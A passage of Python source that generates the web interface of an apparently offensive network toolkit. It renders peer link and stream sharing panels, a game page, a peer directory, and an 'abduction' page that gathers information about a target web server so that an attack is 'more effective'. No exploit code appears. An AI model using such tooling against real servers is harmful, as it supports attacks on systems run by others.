  1600. globalnet_table = "<table cellpadding='5' cellspacing='5' border='1'><tr><td align='center'><u>OWNER:</u></td><td align='center'><u>COMMENT:</u></td><td align='center'><u>WARPING:</u></td></tr>"
  1601. for m in self.list_globalnet: # list = owner, comment, warping, ip
  1602. if globalnet_msg_sep in m:
  1603. m = m.split(globalnet_msg_sep)
  1604. globalnet_owner = m[0][0:12] # owner
  1605. globalnet_owner = ''.join(random.sample(globalnet_owner,len(globalnet_owner))) # owner (obfuscation)
  1606. globalnet_comment = m[1][0:32] # comment
  1607. globalnet_comment = ''.join(random.sample(globalnet_comment,len(globalnet_comment))) # globalnet (obfuscation)
  1608. globalnet_warp = m[2][0:12] # warp
  1609. globalnet_warp = ''.join(random.sample(globalnet_warp,len(globalnet_warp))) # warp (obfuscation)
  1610. globalnet_table += "<tr><td align='center'>"+str(globalnet_owner)+"</td><td align='center'>"+str(globalnet_comment)+"</td><td align='center'>"+str(globalnet_warp)+"</td></tr>"
  1611. globalnet_table += "</table>"
  1612. mother_globalnet = "<div id='globalnet_panel_enc' style='display:block'>"
  1613. globalnet_table = mother_globalnet + globalnet_table + "</div>"
  1614. return globalnet_table
  1615. def html_links(self):
  1616. l = time.ctime(os.path.getmtime(self.links_file)) # get last modified time
  1617. now = strftime("%d-%m-%Y %H:%M:%S", gmtime())
  1618. links_table = self.generate_links()
  1619. return self.pages["/header"] + """<script language="javascript">
  1620. function Decrypt_links(){
  1621. link_deckey=document.getElementById("link_deckey").value
  1622. if(link_deckey == "") {
  1623. window.alert("You need to enter a valid key (provided by someone)");
  1624. return
  1625. }else{
  1626. params="link_deckey="+escape(link_deckey)
  1627. runCommandX("cmd_decrypt_links",params)
  1628. panel_enc = document.getElementById("links_panel_enc").style.display
  1629. if(panel_enc == "block"){
  1630. panel_enc = document.getElementById("links_panel_enc").style.display = 'none';
  1631. }
  1632. }
  1633. }
  1634. function Ranking() {
  1635. var win_ranking = window.open("ranking","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1636. }
  1637. function Grid() {
  1638. var win_grid = window.open("grid","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1639. }
  1640. function Board() {
  1641. var win_board = window.open("board","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1642. }
  1643. function Stats() {
  1644. var win_stats = window.open("stats","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1645. }
  1646. function Streams() {
  1647. var win_streams = window.open("streams","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1648. }
  1649. function SyncLinks(){
  1650. link_source=document.getElementById("link_source").value
  1651. if(link_source == "") {
  1652. window.alert("You need to enter a valid IP (with a 'blackhole' listening on).");
  1653. return
  1654. }else{
  1655. params="link_source="+escape(link_source)
  1656. runCommandX("cmd_sync_links",params)
  1657. setTimeout("location.reload()", 10000)
  1658. }
  1659. }
  1660. function LinkFilter(filter, key) {
  1661. params="filter="+escape(filter)+"&key="+escape(key)
  1662. runCommandX("cmd_link_filter", params)
  1663. setTimeout("Decrypt_links()", 2000)
  1664. }
  1665. function Send() {
  1666. link_source2=document.getElementById("link_source2").value
  1667. link_enckey=document.getElementById("link_enckey").value
  1668. link_topic=document.getElementById("link_topic").value
  1669. link_url=document.getElementById("link_url").value
  1670. if(link_source2 == "") {
  1671. window.alert("You need to enter a valid IP (with a 'blackhole' listening on).");
  1672. return
  1673. }else{
  1674. if(link_enckey == "") {
  1675. window.alert("You need to enter a valid key (provided by someone)");
  1676. return
  1677. }else{
  1678. if(link_url == "http://127.0.0.1") {
  1679. window.alert("You need to enter a valid link");
  1680. return
  1681. }else{
  1682. params="link_source2="+escape(link_source2)+"&link_enckey="+escape(link_enckey)+"&link_topic="+escape(link_topic)+"&link_url="+escape(link_url)
  1683. runCommandX("cmd_transfer_link",params)
  1684. setTimeout("location.reload()", 10000)
  1685. }
  1686. }
  1687. }
  1688. }
  1689. </script>
  1690. </head><body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" onload="start()" onresize="resize()" onorientationchange="resize()" onmousedown="context.fillStyle='rgba(0,0,0,'+opacity+')'" onmouseup="context.fillStyle='rgb(0,0,0)'">
  1691. <canvas id="starfield" style="z-index:-1; background-color:#000000; position:fixed; top:0; left:0;"></canvas>
  1692. <br>
  1693. <center>
  1694. <table bgcolor="black" cellpadding="24" cellspacing="25" border="0"><tr>
  1695. <td><a href="javascript:alert('Armada KATRAAZKA says: SSSSssshshhhh! """ + self.ranking + """,... this is our ship-library. You can take and leave links, without any price.');"><img src='data:image/png;base64,"""+self.alien10_img+"""'></a></td>
  1696. <td>DATA/LINKS device: <font color='green'>ON</font><br><br><button title="Review stats from other motherships and share yours with them..." onclick="Grid()">VISIT GRID!</button> <button title="Visit ranking stats..." onclick="Ranking()">VISIT RANKING!</button> <br><br> <button title="Visit board panel..." onclick="Board()">VISIT BOARD!</button> <button title="Visit ship stats..." onclick="Stats()">VISIT STATS!</button> <button title="Visit global.streams..." onclick="Streams()">VISIT STREAMS!</button></td>
  1697. </tr></table>
  1698. <hr><br>
  1699. <center><table cellpadding="5" border="1"><tr><td>Blackhole/IP:</td><td><input type='text' name='link_source' id='link_source' size='20' value='"""+default_blackhole+"""'></td><td><button title="Download 'links' proposed by other motherships..." onclick="SyncLinks()">DOWNLOAD!</button></td><td><form method='GET'><input type="hidden" name="link_deckey" id="link_deckey" size="20" value='"""+self.crypto_key+"""' READONLY><a style='color:red;text-decoration:underline red;' onclick=javascript:Decrypt_links();>Try decryption!</a></td></tr></table></center></form><br><hr><form method='GET'><table cellpadding='5' cellspacing='5'><tr><td>TOPIC:</td><td> <select id="link_topic">
  1700. <option value="OFF" selected>OFF - NO-Topic</option>
  1701. <option value="WKP">WKP - Wikipedia + Knowledge</option>
  1702. <option value="NSA">NSA - National Space/Security Agency</option>
  1703. <option value="DPW">DPW - Deep Web / Dark Web</option>
  1704. <option value="HCP">HCP - Hacking / Cracking / Phreaking</option>
  1705. <option value="HAR">HAR - Hardware / Electronics</option>
  1706. <option value="FPR">FPR - Freedom / Privacy / Rights</option>
  1707. <option value="HAR">SEC - Hardering / C.R.Y.P.T.O</option>
  1708. <option value="APT">APT - ArT.Trolling / #PSY-OPS</option>
  1709. <option value="SPM">SPM - Propaganda + SPAM</option>
  1710. <option value="SCI">SCI - SCience + phi</option>
  1711. <option value="UFO">UFO - UFONET</option>
  1712. </select></td></tr><tr><td>Your link:</td><td><input type="text" name="link_url" id="link_url" size="90" placeholder="http(s)://" required pattern="https?://.+"></td>
  1713. </tr><tr><td>Blackhole/IP:</td><td><input type='text' name='link_source2' id='link_source2' size='20' value='"""+default_blackhole+"""'></td></tr><tr><td><input type="hidden" name="link_enckey" id="link_enckey" size="20" value='"""+self.crypto_key+"""' READONLY></td></tr></table></form><button title="Send your link to other motherships..." onClick=Send() style="color:yellow; height:40px; width:240px; font-weight:bold; background-color:red; border: 2px solid yellow;">SEND!</button></pre></td></tr></table><br><br>
  1714. <hr><br>
  1715. <u>DATA.LINKS</u>: (Last Update: <font color='green'>"""+str(l)+"""</font>)<br><br>"""+links_table+"""<div id='cmdOut'></div><br><br>"""+ self.pages["/footer"]
  1716. def html_streams(self):
  1717. l = time.ctime(os.path.getmtime(self.streams_file)) # get last modified time
  1718. now = strftime("%d-%m-%Y %H:%M:%S", gmtime())
  1719. streams_table = self.generate_streams()
  1720. return self.pages["/header"] + """<script language="javascript">
  1721. function Decrypt_streams(){
  1722. stream_deckey=document.getElementById("stream_deckey").value
  1723. if(stream_deckey == "") {
  1724. window.alert("You need to enter a valid key (provided by someone)");
  1725. return
  1726. }else{
  1727. params="stream_deckey="+escape(stream_deckey)
  1728. runCommandX("cmd_decrypt_streams",params)
  1729. panel_enc = document.getElementById("streams_panel_enc").style.display
  1730. if(panel_enc == "block"){
  1731. panel_enc = document.getElementById("streams_panel_enc").style.display = 'none';
  1732. }
  1733. }
  1734. }
  1735. function Ranking() {
  1736. var win_ranking = window.open("ranking","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1737. }
  1738. function Grid() {
  1739. var win_grid = window.open("grid","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1740. }
  1741. function Board() {
  1742. var win_board = window.open("board","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1743. }
  1744. function Stats() {
  1745. var win_stats = window.open("stats","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1746. }
  1747. function Links() {
  1748. var win_links = window.open("links","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1749. }
  1750. function SyncStreams(){
  1751. stream_source=document.getElementById("stream_source").value
  1752. if(stream_source == "") {
  1753. window.alert("You need to enter a valid IP (with a 'blackhole' listening on).");
  1754. return
  1755. }else{
  1756. params="stream_source="+escape(stream_source)
  1757. runCommandX("cmd_sync_streams",params)
  1758. setTimeout("location.reload()", 10000)
  1759. }
  1760. }
  1761. function StreamFilter(filter, key) {
  1762. params="filter="+escape(filter)+"&key="+escape(key)
  1763. runCommandX("cmd_stream_filter", params)
  1764. setTimeout("Decrypt_streams()", 2000)
  1765. }
  1766. function Send() {
  1767. stream_source2=document.getElementById("stream_source2").value
  1768. stream_enckey=document.getElementById("stream_enckey").value
  1769. stream_topic=document.getElementById("stream_topic").value
  1770. stream_url=document.getElementById("stream_url").value
  1771. if(stream_source2 == "") {
  1772. window.alert("You need to enter a valid IP (with a 'blackhole' listening on).");
  1773. return
  1774. }else{
  1775. if(stream_enckey == "") {
  1776. window.alert("You need to enter a valid key (provided by someone)");
  1777. return
  1778. }else{
  1779. if (stream_url.startsWith("https://www.youtube.com/watch?v=") == false){
  1780. window.alert("You need to enter a valid (only Youtube is supported) URL stream (ex: https://www.youtube.com/watch?v=xxxxxxxxxxx)");
  1781. return
  1782. }else{
  1783. params="stream_source2="+escape(stream_source2)+"&stream_enckey="+escape(stream_enckey)+"&stream_topic="+escape(stream_topic)+"&stream_url="+escape(stream_url)
  1784. runCommandX("cmd_transfer_stream",params)
  1785. setTimeout("location.reload()", 10000)
  1786. }
  1787. }
  1788. }
  1789. }
  1790. function PlayStream() {
  1791. video_id = document.getElementById("play_button").value;
  1792. document.getElementById("play_button").style.display = 'none';
  1793. document.getElementById("video").style.display = 'block';
  1794. document.getElementById("video").innerHTML = "<div id='player'></div>";
  1795. var tag = document.createElement('script');
  1796. tag.src = "https://www.youtube.com/iframe_api";
  1797. var firstScriptTag = document.getElementsByTagName('script')[0];
  1798. firstScriptTag.parentNode.insertBefore(tag, firstScriptTag);
  1799. }
  1800. var player;
  1801. function onYouTubeIframeAPIReady() {
  1802. player = new YT.Player('player', {
  1803. height: '390',
  1804. width: '640',
  1805. videoId: video_id,
  1806. events: {
  1807. 'onReady': onPlayerReady,
  1808. 'onStateChange': onPlayerStateChange
  1809. }
  1810. });
  1811. }
  1812. function onPlayerReady(event) {
  1813. event.target.playVideo();
  1814. }
  1815. var done = false;
  1816. function onPlayerStateChange(event) {
  1817. if (event.data == YT.PlayerState.PLAYING && !done) {
  1818. done = true;
  1819. }
  1820. if (event.data === 0) {
  1821. document.getElementById("play_button").style.display = 'block';
  1822. document.getElementById("video").style.display = 'none';
  1823. }
  1824. }
  1825. function stopVideo() {
  1826. player.stopVideo();
  1827. }
  1828. </script>
  1829. </head><body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" onload="start()" onresize="resize()" onorientationchange="resize()" onmousedown="context.fillStyle='rgba(0,0,0,'+opacity+')'" onmouseup="context.fillStyle='rgb(0,0,0)'">
  1830. <canvas id="starfield" style="z-index:-1; background-color:#000000; position:fixed; top:0; left:0;"></canvas>
  1831. <br>
  1832. <center>
  1833. <table bgcolor="black" cellpadding="24" cellspacing="25" border="0"><tr>
  1834. <td><a href="javascript:alert('Dr. UHÑÄAUFKATRAAZKA says: Hello! """ + self.ranking + """,... these are the current (audio/video/live) streams available. Enjoy!');"><img src='data:image/png;base64,"""+self.alien9_img+"""'></a></td>
  1835. <td>STREAMS device: <font color='green'>ON</font><br><br><button title="Review stats from other motherships and share yours with them..." onclick="Grid()">VISIT GRID!</button> <button title="Visit ranking stats..." onclick="Ranking()">VISIT RANKING!</button> <br><br> <button title="Visit board panel..." onclick="Board()">VISIT BOARD!</button> <button title="Visit ship stats..." onclick="Stats()">VISIT STATS!</button> <button title="Visit ship.links..." onclick="Links()">VISIT LINKS!</button></td>
  1836. </tr></table>
  1837. <hr><br>
  1838. <center><table cellpadding="5" border="1"><tr><td>Blackhole/IP:</td><td><input type='text' name='stream_source' id='stream_source' size='20' value='"""+default_blackhole+"""'></td><td><button title="Download 'streams' proposed by other motherships..." onclick="SyncStreams()">DOWNLOAD!</button></td><td><form method='GET'><input type="hidden" name="stream_deckey" id="stream_deckey" size="20" value='"""+self.crypto_key+"""' READONLY><a style='color:red;text-decoration:underline red;' onclick=javascript:Decrypt_streams();>Try decryption!</a></td></tr></table></center></form><br><hr><form method='GET'><table cellpadding='5' cellspacing='5'><tr><td>TOPIC:</td><td> <select id="stream_topic">
  1839. <option value="OFF" selected>OFF - NO-Topic</option>
  1840. <option value="WKP">WKP - Wikipedia + Knowledge</option>
  1841. <option value="NSA">NSA - National Space/Security Agency</option>
  1842. <option value="DPW">DPW - Deep Web / Dark Web</option>
  1843. <option value="HCP">HCP - Hacking / Cracking / Phreaking</option>
  1844. <option value="HAR">HAR - Hardware / Electronics</option>
  1845. <option value="FPR">FPR - Freedom / Privacy / Rights</option>
  1846. <option value="HAR">SEC - Hardering / C.R.Y.P.T.O</option>
  1847. <option value="APT">APT - ArT.Trolling / #PSY-OPS</option>
  1848. <option value="SPM">SPM - Propaganda + SPAM</option>
  1849. <option value="SCI">SCI - SCience + phi</option>
  1850. <option value="UFO">UFO - UFONET</option>
  1851. </select></td></tr><tr><td>Your (url) stream:</td><td><input type="text" name="stream_url" id="stream_url" size="90" placeholder="http(s)://" required pattern="https?://.+"></td>
  1852. </tr><tr><td>Blackhole/IP:</td><td><input type='text' name='stream_source2' id='stream_source2' size='20' value='"""+default_blackhole+"""'></td></tr><tr><td><input type="hidden" name="stream_enckey" id="stream_enckey" size="20" value='"""+self.crypto_key+"""' READONLY></td></tr></table></form><button title="Send your stream to other motherships..." onClick=Send() style="color:yellow; height:40px; width:240px; font-weight:bold; background-color:red; border: 2px solid yellow;">SEND!</button></pre></td></tr></table><br><br>
  1853. <hr><br>
  1854. <u>VIDEO.STREAMS</u>: (Last Update: <font color='green'>"""+str(l)+"""</font>)<br><br>"""+streams_table+"""<div id='cmdOut'></div><br><br>"""+ self.pages["/footer"]
  1855. def html_games(self):
  1856. games_table = self.generate_games()
  1857. return self.pages["/header"] + """<script language="javascript">
  1858. function Ranking() {
  1859. var win_ranking = window.open("ranking","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1860. }
  1861. function Wargames() {
  1862. var win_wargames = window.open("wargames","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1863. }
  1864. function Grid() {
  1865. var win_grid = window.open("grid","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1866. }
  1867. function Board() {
  1868. var win_board = window.open("board","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1869. }
  1870. function Stats() {
  1871. var win_stats = window.open("stats","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1872. }
  1873. function PlayGame() {
  1874. var win_game = window.open("spaceinvaders","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1875. }
  1876. </script>
  1877. </head><body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" onload="start()" onresize="resize()" onorientationchange="resize()" onmousedown="context.fillStyle='rgba(0,0,0,'+opacity+')'" onmouseup="context.fillStyle='rgb(0,0,0)'">
  1878. <canvas id="starfield" style="z-index:-1; background-color:#000000; position:fixed; top:0; left:0;"></canvas>
  1879. <br>
  1880. <center>
  1881. <table bgcolor="black" cellpadding="24" cellspacing="25" border="0"><tr>
  1882. <td><a href="javascript:alert('Barrier UJJJHGYTYGASOO-IV says: HI slave!... I mean ... worker!... I mean, """ + self.ranking + """,... Do you wanna play some games?!');"><img src='data:image/png;base64,"""+self.alien12_img+"""'></a></td>
  1883. <td>GAMES device: <font color='green'>ON</font><br><br><button title="Review stats from other motherships and share yours with them..." onclick="Grid()">VISIT GRID!</button> <button title="Visit ranking stats..." onclick="Ranking()">VISIT RANKING!</button> <br><br> <button title="Visit board panel..." onclick="Board()">VISIT BOARD!</button> <button title="Visit ship stats..." onclick="Stats()">VISIT STATS!</button> <button title="Visit current ship.Wargames..." onclick="Wargames()">VISIT WARGAMES!</button></td>
  1884. </tr></table>
  1885. <hr><br>
  1886. <u>SHIP.GAMES</u>: <br><br>"""+games_table+"""<br><br>"""+ self.pages["/footer"]
  1887. def html_spaceinvaders(self):
  1888. return self.pages["/header"] + """<script language="javascript"></script>
  1889. </head><body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" onload="start()" onresize="resize()" onorientationchange="resize()" onmousedown="context.fillStyle='rgba(0,0,0,'+opacity+')'" onmouseup="context.fillStyle='rgb(0,0,0)'">
  1890. <canvas id="starfield" style="z-index:-1; background-color:#000000; position:fixed; top:0; left:0;"></canvas>
  1891. <br><center>
  1892. <hr><br>
  1893. <div id="gamecontainer">
  1894. <canvas id="gameCanvas"></canvas>
  1895. </div>
  1896. <div id="info">
  1897. <p>Move with arrow keys or swipe, fire with the space bar or touch. The invaders get faster and drop
  1898. more bombs as you complete each level!</p>
  1899. </div></script><script src="js/spaceinvaders.js"></script><script>
  1900. var canvas = document.getElementById("gameCanvas");
  1901. canvas.width = 800;
  1902. canvas.height = 600;
  1903. var game = new Game();
  1904. game.initialise(canvas);
  1905. game.start();
  1906. window.addEventListener("keydown", function keydown(e) {
  1907. var keycode = e.which || window.event.keycode;
  1908. // Supress further processing of left/right/space (37/29/32)
  1909. if(keycode == 37 || keycode == 39 || keycode == 32) {
  1910. e.preventDefault();
  1911. }
  1912. game.keyDown(keycode);
  1913. });
  1914. window.addEventListener("keyup", function keydown(e) {
  1915. var keycode = e.which || window.event.keycode;
  1916. game.keyUp(keycode);
  1917. });
  1918. window.addEventListener("touchstart", function (e) {
  1919. game.touchstart(e);
  1920. }, false);
  1921. window.addEventListener('touchend', function(e){
  1922. game.touchend(e);
  1923. }, false);
  1924. window.addEventListener('touchmove', function(e){
  1925. game.touchmove(e);
  1926. }, false);
  1927. function toggleMute() {
  1928. game.mute();
  1929. document.getElementById("muteLink").innerText = game.sounds.mute ? "unmute" : "mute";
  1930. }
  1931. </script><br><br>"""+ self.pages["/footer"]
  1932. def html_browser(self):
  1933. browser_table = self.generate_browser()
  1934. return self.pages["/header"] + """<script language="javascript">
  1935. function Ranking() {
  1936. var win_ranking = window.open("ranking","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1937. }
  1938. function Grid() {
  1939. var win_grid = window.open("grid","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1940. }
  1941. function Board() {
  1942. var win_board = window.open("board","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1943. }
  1944. function Links() {
  1945. var win_links = window.open("links","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1946. }
  1947. function Streams() {
  1948. var win_streams = window.open("streams","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1949. }
  1950. </script>
  1951. </head><body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" onload="start()" onresize="resize()" onorientationchange="resize()" onmousedown="context.fillStyle='rgba(0,0,0,'+opacity+')'" onmouseup="context.fillStyle='rgb(0,0,0)'">
  1952. <canvas id="starfield" style="z-index:-1; background-color:#000000; position:fixed; top:0; left:0;"></canvas>
  1953. <br>
  1954. <center>
  1955. <table bgcolor="black" cellpadding="24" cellspacing="25" border="0"><tr>
  1956. <td><a href="javascript:alert('Rockoide GRAAANJJÄEEEB says: HI organic living structure..., """ + self.ranking + """,... You can navigate/surf the Net from here...');"><img src='data:image/png;base64,"""+self.alien13_img+"""'></a></td>
  1957. <td>BROWSER device: <font color='green'>ON</font><br><br><button title="Review stats from other motherships and share yours with them..." onclick="Grid()">VISIT GRID!</button> <button title="Visit ranking stats..." onclick="Ranking()">VISIT RANKING!</button> <br><br> <button title="Visit board panel..." onclick="Board()">VISIT BOARD!</button> <button title="Visit ship.Links..." onclick="Links()">VISIT LINKS!</button> <button title="Visit current ship.Streams..." onclick="Streams()">VISIT STREAMS!</button></td>
  1958. </tr></table>
  1959. <hr><br>"""+browser_table+"""<br><br>"""+ self.pages["/footer"]
  1960. def html_globalnet(self):
  1961. l = time.ctime(os.path.getmtime(self.links_file)) # get last modified time
  1962. globalnet_table = self.generate_globalnet()
  1963. return self.pages["/header"] + """<script language="javascript">
  1964. function Ranking() {
  1965. var win_ranking = window.open("ranking","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1966. }
  1967. function Grid() {
  1968. var win_grid = window.open("grid","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1969. }
  1970. function Board() {
  1971. var win_board = window.open("board","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1972. }
  1973. function Warps() {
  1974. var win_blackholes = window.open("blackholes","_parent","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  1975. }
  1976. function SyncGlobalnet(){
  1977. globalnet_source=document.getElementById("globalnet_source").value
  1978. if(globalnet_source == "") {
  1979. window.alert("You need to enter a valid IP (with a 'blackhole' listening on).");
  1980. return
  1981. }else{
  1982. params="globalnet_source="+escape(globalnet_source)
  1983. runCommandX("cmd_sync_globalnet",params)
  1984. setTimeout("location.reload()", 10000)
  1985. }
  1986. }
  1987. function Decrypt_globalnet(){
  1988. globalnet_deckey=document.getElementById("globalnet_deckey").value
  1989. if(globalnet_deckey == "") {
  1990. window.alert("You need to enter a valid key (provided by someone)");
  1991. return
  1992. }else{
  1993. params="globalnet_deckey="+escape(globalnet_deckey)
  1994. runCommandX("cmd_decrypt_globalnet",params)
  1995. panel_enc = document.getElementById("globalnet_panel_enc").style.display
  1996. if(panel_enc == "block"){
  1997. panel_enc = document.getElementById("globalnet_panel_enc").style.display = 'none';
  1998. }
  1999. }
  2000. }
  2001. function GlobalnetFilter(filter, key) {
  2002. params="filter="+escape(filter)+"&key="+escape(key)
  2003. runCommandX("cmd_globalnet_filter", params)
  2004. setTimeout("Decrypt_globalnet()", 2000)
  2005. }
  2006. function Send() {
  2007. globalnet_source2=document.getElementById("globalnet_source2").value
  2008. globalnet_enckey=document.getElementById("globalnet_enckey").value
  2009. globalnet_owner=document.getElementById("globalnet_owner").value
  2010. globalnet_comment=document.getElementById("globalnet_comment").value
  2011. globalnet_warp=document.getElementById("globalnet_warp").value
  2012. if(globalnet_source2 == "") {
  2013. window.alert("You need to enter a valid IP (with a 'blackhole' listening on).");
  2014. return
  2015. }else{
  2016. if(globalnet_enckey == "") {
  2017. window.alert("You need to enter a valid key (provided by someone)");
  2018. return
  2019. }else{
  2020. params="globalnet_source2="+escape(globalnet_source2)+"&globalnet_enckey="+escape(globalnet_enckey)+"&globalnet_owner="+escape(globalnet_owner)+"&globalnet_comment="+escape(globalnet_comment)+"&globalnet_warp="+escape(globalnet_warp)
  2021. runCommandX("cmd_transfer_globalnet",params)
  2022. setTimeout("location.reload()", 10000)
  2023. }
  2024. }
  2025. }
  2026. </script>
  2027. </head><body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" onload="start()" onresize="resize()" onorientationchange="resize()" onmousedown="context.fillStyle='rgba(0,0,0,'+opacity+')'" onmouseup="context.fillStyle='rgb(0,0,0)'">
  2028. <canvas id="starfield" style="z-index:-1; background-color:#000000; position:fixed; top:0; left:0;"></canvas>
  2029. <br>
  2030. <center>
  2031. <table bgcolor="black" cellpadding="24" cellspacing="25" border="0"><tr>
  2032. <td><a href="javascript:alert('Senator M.BIRDY says: Welcome ..., """ + self.ranking + """,... These are other visible motherships detected by our technology, that are currently working for the Federation... You can contribute by uploading your location... Remember, to be a strong network, always depends on you!');"><img src='data:image/png;base64,"""+self.alien11_img+"""'></a></td>
  2033. <td>RADAR device: <font color='green'>ON</font><br><br><button title="Review stats from other motherships and share yours with them..." onclick="Grid()">VISIT GRID!</button> <button title="Visit ranking stats..." onclick="Ranking()">VISIT RANKING!</button> <br><br> <button title="Visit board panel..." onclick="Board()">VISIT BOARD!</button> <button title="Visit visible blackhole.Warps..." onclick="Warps()">VISIT WARPS!</button></td>
  2034. </tr></table>
  2035. <hr><br>
  2036. <center><table cellpadding="5" border="1"><tr><td>Blackhole/IP:</td><td><input type='text' name='globalnet_source' id='globalnet_source' size='20' value='"""+default_blackhole+"""'></td><td><button title="Download 'locations' proposed by other motherships..." onclick="SyncGlobalnet()">DOWNLOAD!</button></td><td><form method='GET'><input type="hidden" name="globalnet_deckey" id="globalnet_deckey" size="20" value='"""+self.crypto_key+"""' READONLY><a style='color:red;text-decoration:underline red;' onclick=javascript:Decrypt_globalnet();>Try decryption!</a></td></tr></table></center></form><br><hr><form method='GET'><table cellpadding='5' cellspacing='5'><tr>
  2037. <td>Owner (your nick):</td><td><input type="text" maxlength="12" pattern=".{3,12}" title="3 to 12 characters" name="globalnet_owner" id="globalnet_owner" size="12" placeholder="Anonymous"></td></tr><tr><td>Ship Description (short comment):</td><td><input type="text" maxlength="90" name="globalnet_comment" id="globalnet_comment" size="90" placeholder="Uplink open from 00:00-GMT3 until 02:00-GMT3"></td></tr><tr><td>WARPING:</td><td> <select id="globalnet_warp">
  2038. <option value="OFF" selected>OFF - Blackhole technology is -OFF-</option>
  2039. <option value="ON1">ON1 - Blackhole technology is -ON- (download only)</option>
  2040. <option value="ON2">ON2 - Blachhole technology is -ON- (upload/download)</option>
  2041. </select></td></tr><tr><td>Blackhole/IP:</td><td><input type='text' name='globalnet_source2' id='globalnet_source2' size='20' value='"""+default_blackhole+"""'></td></tr><tr><td><input type="hidden" name="globalnet_enckey" id="globalnet_enckey" size="20" value='"""+self.crypto_key+"""' READONLY></td></tr></table></form><button title="Send your location to other motherships..." onClick=Send() style="color:yellow; height:40px; width:240px; font-weight:bold; background-color:red; border: 2px solid yellow;">SUBMIT!</button></pre></td></tr></table><br><br><hr><br><u>GLOBAL.NET</u>: (Last Update: <font color='green'>"""+str(l)+"""</font>)<br><br>"""+globalnet_table+"""<div id='cmdOut'></div><br><br>"""+ self.pages["/footer"]
  2042. def html_abduction(self):
  2043. return self.pages["/header"] + """<script language="javascript">
  2044. function Requests() {
  2045. var win_requests = window.open("requests","_blank","fullscreen=no, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  2046. }
  2047. function Start(){
  2048. target=document.getElementById("target").value
  2049. String.prototype.startsWith = function(prefix){
  2050. return this.indexOf(prefix) === 0;
  2051. }
  2052. if(target.startsWith("http")){
  2053. params="target="+escape(target)
  2054. }else{
  2055. window.alert("Target url not valid! -> It should starts with 'http(s)://'");
  2056. return
  2057. }
  2058. runCommandX("cmd_abduction",params)
  2059. }
  2060. </script></head><body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" onload="start()" onresize="resize()" onorientationchange="resize()" onmousedown="context.fillStyle='rgba(0,0,0,'+opacity+')'" onmouseup="context.fillStyle='rgb(0,0,0)'">
  2061. <canvas id="starfield" style="z-index:-1; background-color:#000000; position:fixed; top:0; left:0;"></canvas>
  2062. <br>
  2063. <center>
  2064. <table cellpadding="5" cellspacing="5"><tr>
  2065. <td><a href="javascript:alert('Ofgöfeejh says: """ + self.ranking + """... Lets research about our enemies first, right?...');"><img src='data:image/png;base64,"""+self.alien7_img+"""'></a></td>
  2066. <td>
  2067. <pre>
  2068. This feature will provide you information about target's web server.
  2069. You can use this before to attack to be more effective.
  2070. <button title="Configure how you will perform requests (proxy, HTTP headers, etc)..." onclick="Requests()">Configure requests</button>
  2071. <hr>
  2072. * Set your target: <input type="text" name="target" id="target" size="30" placeholder="http(s)://" required pattern="https?://.+">
  2073. <hr>
  2074. <button title="Start to research about your target's webserver configuration..." onClick=Start() style="color:yellow; height:40px; width:240px; font-weight:bold; background-color:red; border: 2px solid yellow;">RESEARCH!</button>
  2075. </pre>
  2076. </td></tr></table>
  2077. <hr><br>
  2078. <div id="cmdOut"></div>""" + self.pages["/footer"]
  2079. def html_blackholes(self):
  2080. return self.pages["/header"] + """<script language="javascript">
  2081. function Decrypt(){
  2082. blackhole_key=document.getElementById("blackhole_key").value
  2083. if(blackhole_key == "") {
